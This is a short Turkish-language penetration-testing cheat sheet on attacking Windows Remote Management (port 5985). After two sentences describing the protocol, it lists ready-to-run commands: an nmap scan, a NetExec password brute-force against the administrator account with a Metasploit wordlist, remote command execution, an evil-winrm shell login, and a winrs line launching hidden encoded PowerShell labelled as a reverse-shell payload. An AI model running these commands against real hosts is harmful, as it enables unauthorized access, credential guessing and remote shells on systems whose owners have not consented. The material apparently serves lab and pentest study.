WinRM (5985)

WinRM (Windows Remote Management), Windows işletim sistemlerinde uzaktan yönetim görevlerini gerçekleştirmek için kullanılan bir protokoldür.
Sistem yöneticilerinin uzaktaki Windows makinelerinde komutlar çalıştırmasını, yapılandırma değişiklikleri yapmasını ve sistem bilgilerini toplamasını sağlar.

nmap -sV -sC -p 5985 192.168.1.3

nxc winrm 192.168.1.2 -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

nxc winrm 192.168.1.2 -u administrator -p password123 -x "whoami"

evil-winrm -u administrator -p 'password123' -i 192.168.1.2

winrs -r:192.168.246.72 -u:john -p:Password123 "powershell -nop -w hidden -e base64_rev"

Last updated 18 days ago